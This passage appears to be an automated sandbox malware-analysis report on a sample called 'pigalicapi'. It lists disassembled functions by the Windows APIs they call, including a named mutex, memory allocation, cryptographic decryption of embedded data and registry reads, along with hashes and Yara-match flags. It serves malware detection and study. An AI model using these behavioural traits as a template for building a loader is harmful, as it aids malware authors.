                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: String
                                                                                                                                                                                • String ID: LCMapStringEx
                                                                                                                                                                                • API String ID: 2568140703-3893581201
                                                                                                                                                                                • Opcode ID: 42b0e6f65655394d18f474b7002ebf715032ede60d4c3fcbc73e77d745b4c9bb
                                                                                                                                                                                • Instruction ID: 90398f739bd0d47cfc969094445c8d210c28f522da24f3d55fd8a93fb2043fad
                                                                                                                                                                                • Opcode Fuzzy Hash: 42b0e6f65655394d18f474b7002ebf715032ede60d4c3fcbc73e77d745b4c9bb
                                                                                                                                                                                • Instruction Fuzzy Hash: 9501103662021DBBCF129F90EC05EEE3F62EB58750F414218FE0826161CA729931AB90
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,005D3BEB), ref: 005D5E0C
                                                                                                                                                                                • GetLastError.KERNEL32(?,005D3BEB), ref: 005D5E12
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateErrorLastMutex
                                                                                                                                                                                • String ID: pigalicapi
                                                                                                                                                                                • API String ID: 1925916568-2184165135
                                                                                                                                                                                • Opcode ID: 10342649e60ff52b51e5c22ceed2017400c158d679be2ec23b934801c459db13
                                                                                                                                                                                • Instruction ID: 7909c03bbc7804921243fb472d6c62dad4b35657f72869d71a7467485a0e6d1a
                                                                                                                                                                                • Opcode Fuzzy Hash: 10342649e60ff52b51e5c22ceed2017400c158d679be2ec23b934801c459db13
                                                                                                                                                                                • Instruction Fuzzy Hash: 13C08C362C43346BE21417A2ED4BB493F889B20F81F600023F10ED60E18981A484EB16
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • StrStrA.SHLWAPI(00000004,-->), ref: 005D8300
                                                                                                                                                                                  • Part of subcall function 005D8090: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 005D80D8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                • String ID: -->$<!--
                                                                                                                                                                                • API String ID: 4275171209-1166897919
                                                                                                                                                                                • Opcode ID: 544cff4a78ae614726096df73a8d67002cb8d824ffe4586cd008645cb0c36324
                                                                                                                                                                                • Instruction ID: b05b8fc91ad8f1e54fbeee183f74d55ba40564691cd425467e835566d76d2e40
                                                                                                                                                                                • Opcode Fuzzy Hash: 544cff4a78ae614726096df73a8d67002cb8d824ffe4586cd008645cb0c36324
                                                                                                                                                                                • Instruction Fuzzy Hash: EA31F370900249DFDF24DFA8C944BAEBBB1FB48305F18899BE419A7341DB749A48CB91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 005DA45C
                                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 005DA480
                                                                                                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 005DA494
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3677997916-0
                                                                                                                                                                                • Opcode ID: 54f02fb9fc5f96d8ecc46fe618c354c3fb05a7d4845c4444b0699aa8371fa3fb
                                                                                                                                                                                • Instruction ID: 62980b3b720b7d099cdef8db16e3b7ed67f309a1970a8d75a927767e8a0c8bbd
                                                                                                                                                                                • Opcode Fuzzy Hash: 54f02fb9fc5f96d8ecc46fe618c354c3fb05a7d4845c4444b0699aa8371fa3fb
                                                                                                                                                                                • Instruction Fuzzy Hash: A5110A74A01209EBDF25CF98C848BEFBBB4FB44704F10895EE9149B280D7B49A55DB52
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0120FA83
                                                                                                                                                                                • _free.LIBCMT ref: 0120FABC
                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0120FAC3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EnvironmentStrings$Free_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2716640707-0
                                                                                                                                                                                • Opcode ID: d049f97c277c5fab92120d894c38bfc068618b6fde2735a4bf7d28b62431d1fc
                                                                                                                                                                                • Instruction ID: 6f1147755fca29f6bd4e711cb271b878aa06268d3394a9150a1c14c0b3145699
                                                                                                                                                                                • Opcode Fuzzy Hash: d049f97c277c5fab92120d894c38bfc068618b6fde2735a4bf7d28b62431d1fc
                                                                                                                                                                                • Instruction Fuzzy Hash: ECE0E5371A45122B973362297D489BF2A18EFE15A17160225F904922C3EE54894141E1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 005D80D8
                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 005D8240
                                                                                                                                                                                  • Part of subcall function 005D8A70: CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 005D8AD3
                                                                                                                                                                                  • Part of subcall function 005D8A70: GetLastError.KERNEL32 ref: 005D8ADD
                                                                                                                                                                                  • Part of subcall function 005D8A70: CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 005D8B0C
                                                                                                                                                                                  • Part of subcall function 005D8A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 005D8B37
                                                                                                                                                                                  • Part of subcall function 005D8A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 005D8B5E
                                                                                                                                                                                  • Part of subcall function 005D8A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 005D8B7A
                                                                                                                                                                                  • Part of subcall function 005D8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 005D8B87
                                                                                                                                                                                  • Part of subcall function 005D8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 005D8B91
                                                                                                                                                                                  • Part of subcall function 005D8A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 005D8B9D
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 005D81F1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$DecryptErrorFreeLastRelease
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 142027497-0
                                                                                                                                                                                • Opcode ID: fd3c4951570c51cc3631149e131d874e3d588187354669050573cfa2a269fb38
                                                                                                                                                                                • Instruction ID: 1a6c194fcf803f6f3677a9649cbe95214d2ae041268a433037f9c1ac6214de7d
                                                                                                                                                                                • Opcode Fuzzy Hash: fd3c4951570c51cc3631149e131d874e3d588187354669050573cfa2a269fb38
                                                                                                                                                                                • Instruction Fuzzy Hash: E151E8B4E00209EFDB14DF98D995BAEBBB5FF88304F14815AE905B7381D770AA44CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Info
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1807457897-3916222277
                                                                                                                                                                                • Opcode ID: 008aa49b0bf0aa4fd3c2e2c31acc3aa0dd3389508f9fe20ea89391075d1b68c6
                                                                                                                                                                                • Instruction ID: 2af606089a75fe75d8074baa0c3c343732cfb298daba1b329272ecb261c4cdf6
                                                                                                                                                                                • Opcode Fuzzy Hash: 008aa49b0bf0aa4fd3c2e2c31acc3aa0dd3389508f9fe20ea89391075d1b68c6
                                                                                                                                                                                • Instruction Fuzzy Hash: 78411A745143489EDF338F688C84BFABBB9DB55304F1406EDD98A87183D275AA458F60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • CharUpperA.USER32(00000000), ref: 005D59E2
                                                                                                                                                                                Strings
                                                                                                                                                                                • abcdefghijklmnopqrstuvwxyz, xrefs: 005D597E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CharUpper
                                                                                                                                                                                • String ID: abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                • API String ID: 9403516-1277644989
                                                                                                                                                                                • Opcode ID: 74f41a23a9229471ac8edcea43ae811173f510c21ad81a0adf081629c7a36926
                                                                                                                                                                                • Instruction ID: 0d4c492329669de808612d6e407578bfb3c0fdb835693ff8fa56b7d00297d3a2
                                                                                                                                                                                • Opcode Fuzzy Hash: 74f41a23a9229471ac8edcea43ae811173f510c21ad81a0adf081629c7a36926
                                                                                                                                                                                • Instruction Fuzzy Hash: 9C212831902209EBCF14CF98E594BEEBBB6BF85315F2085A7F804A7340E3759A45CB40
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0120B144: GetOEMCP.KERNEL32 ref: 0120B16F
                                                                                                                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0120B412,?,00000000), ref: 0120B5E5
                                                                                                                                                                                • GetCPInfo.KERNEL32(00000000,0120B412,?,?,?,0120B412,?,00000000), ref: 0120B5F8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CodeInfoPageValid
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 546120528-0
                                                                                                                                                                                • Opcode ID: 373ff497303a8b2835cb8841c1e1807e2cf00f4d4633cb203926e28890facf87
                                                                                                                                                                                • Instruction ID: 5c1eb90ac60e943e9c911922438b462bd49928a3869e41eeba48f49dc7e8743e
                                                                                                                                                                                • Opcode Fuzzy Hash: 373ff497303a8b2835cb8841c1e1807e2cf00f4d4633cb203926e28890facf87
                                                                                                                                                                                • Instruction Fuzzy Hash: 1A5154799202068FEB36CF69C8846BABBF5EF11310F08426EC2968B2D3D7759545CB80
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 005D8BB0: CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 005D8BFF
                                                                                                                                                                                  • Part of subcall function 005D8BB0: GetLastError.KERNEL32 ref: 005D8C09
                                                                                                                                                                                  • Part of subcall function 005D8BB0: CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 005D8C38
                                                                                                                                                                                  • Part of subcall function 005D8BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 005D8C59
                                                                                                                                                                                  • Part of subcall function 005D8BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 005D8C71
                                                                                                                                                                                  • Part of subcall function 005D8BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 005D8C99
                                                                                                                                                                                  • Part of subcall function 005D8BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 005D8CC1
                                                                                                                                                                                  • Part of subcall function 005D8BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 005D8CD5
                                                                                                                                                                                  • Part of subcall function 005D8BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 005D8CE1
                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000), ref: 005D9513
                                                                                                                                                                                • CharUpperA.USER32(?), ref: 005D9521
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Crypt$Hash$Context$AcquireParam$CharCreateDataDestroyErrorLastReleaseUpperlstrcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2710640451-0
                                                                                                                                                                                • Opcode ID: 6ea696b8e83659b83b46cae5a4922f3cf8cb4cb6b834328ccb5ef96aee5e11cd
                                                                                                                                                                                • Instruction ID: db53c4e2aea408149cdbac7563b5c377e38502ba720f2360ec1036d36c51682c
                                                                                                                                                                                • Opcode Fuzzy Hash: 6ea696b8e83659b83b46cae5a4922f3cf8cb4cb6b834328ccb5ef96aee5e11cd
                                                                                                                                                                                • Instruction Fuzzy Hash: D3412BB1D00209EBDB14DFD8C885BEEBBB5FF98304F54815BE515AB381E634AA45CB90
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 01209C76: GetLastError.KERNEL32 ref: 01209C7A
                                                                                                                                                                                  • Part of subcall function 01209C76: _free.LIBCMT ref: 01209CAD
                                                                                                                                                                                  • Part of subcall function 01209C76: SetLastError.KERNEL32(00000000), ref: 01209CEE
                                                                                                                                                                                  • Part of subcall function 01209C76: _abort.LIBCMT ref: 01209CF4
                                                                                                                                                                                  • Part of subcall function 0120B4CF: _abort.LIBCMT ref: 0120B501
                                                                                                                                                                                  • Part of subcall function 0120B4CF: _free.LIBCMT ref: 0120B535
                                                                                                                                                                                  • Part of subcall function 0120B144: GetOEMCP.KERNEL32 ref: 0120B16F
                                                                                                                                                                                • _free.LIBCMT ref: 0120B428
                                                                                                                                                                                • _free.LIBCMT ref: 0120B45E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorLast_abort
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2991157371-0
                                                                                                                                                                                • Opcode ID: fa5d86a414f416d65cb78150b0ded744ec46f764651711fdadef4a2ad4071e16
                                                                                                                                                                                • Instruction ID: 862a98ba78bfc315b89904714e29b241fd598011cc875b9d84e0358ba7bce72b
                                                                                                                                                                                • Opcode Fuzzy Hash: fa5d86a414f416d65cb78150b0ded744ec46f764651711fdadef4a2ad4071e16
                                                                                                                                                                                • Instruction Fuzzy Hash: E631B735914209AFDB22DFA8D440BBD7BF4EF40320F164299E9049B2D2DB725E40CB10
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 005D4C19
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 005D4C49
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 005D4C60
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 005D4C77
                                                                                                                                                                                • CoUninitialize.OLE32 ref: 005D56F0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocVirtual$ObjectSingleUninitializeWait
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2825510553-0
                                                                                                                                                                                • Opcode ID: bc8800474f912c1a5e0537a91211a65cef7ab9f41eb2d340d2e7daaa465229e2
                                                                                                                                                                                • Instruction ID: ed851693ee2d06bda5dbee797fbd9fe70a7df19085a519fdf176accee995d147
                                                                                                                                                                                • Opcode Fuzzy Hash: bc8800474f912c1a5e0537a91211a65cef7ab9f41eb2d340d2e7daaa465229e2
                                                                                                                                                                                • Instruction Fuzzy Hash: 7CE06531B001059FC720CFA8D480AADBFB0FF58325F544147D441E7300D230D890DB60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,005D9FB2,?,005D9FB2,00000000,?,?,?,005D9E2D), ref: 005D97A9
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,005D9FB2,00000000,?,?,?,005D9E2D), ref: 005D97B0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$AllocateProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1357844191-0
                                                                                                                                                                                • Opcode ID: f8da19afc5477dac833663f021f24085f0348b5ce0a5f8ec8bc226e47acb69f8
                                                                                                                                                                                • Instruction ID: 0dae5b14b49fa1ecfdef5f5373af71b2b820b47c27ef3a129b3be01595c0ef5f
                                                                                                                                                                                • Opcode Fuzzy Hash: f8da19afc5477dac833663f021f24085f0348b5ce0a5f8ec8bc226e47acb69f8
                                                                                                                                                                                • Instruction Fuzzy Hash: D6C09B71141309EBD6509BD8EC0DD9D3F5EE758702F004103B70DC6150CA70A548D762
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0120A5F1: RtlAllocateHeap.NTDLL(00000008,01209521,00000000,?,01209D2B,00000001,00000364,?,01209521,0120908D), ref: 0120A632
                                                                                                                                                                                • _free.LIBCMT ref: 0120FB3B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 614378929-0
                                                                                                                                                                                • Opcode ID: 242749927da509a6c425c6fb25b0a804414df460ca5824167350340b80a17ee2
                                                                                                                                                                                • Instruction ID: 039a5253e8a7cef47f8a8064c2de666726e8443d5cfbfb9b041bdf8e297ffd24
                                                                                                                                                                                • Opcode Fuzzy Hash: 242749927da509a6c425c6fb25b0a804414df460ca5824167350340b80a17ee2
                                                                                                                                                                                • Instruction Fuzzy Hash: 42012B732503466BE3328E599881959FBDCFB89370F25071DE6C4432C1EA30A845C624
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,01209521,00000000,?,01209D2B,00000001,00000364,?,01209521,0120908D), ref: 0120A632
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                • Opcode ID: 4f1edcad46d91b7af26b6e7516543116cd83c699a6f833a7f3f81b0fe1de82c3
                                                                                                                                                                                • Instruction ID: c124aaedda334fee9e47f59b2b4b5c1a9eebebf5484f15505af2509d207b681d
                                                                                                                                                                                • Opcode Fuzzy Hash: 4f1edcad46d91b7af26b6e7516543116cd83c699a6f833a7f3f81b0fe1de82c3
                                                                                                                                                                                • Instruction Fuzzy Hash: 73F024325747266FAF235A2A9C05A6A3BB8AFD03A0F488311EA24971C2CE21D40086F0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,0120C5D8,00000000), ref: 0120C518
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1279760036-0
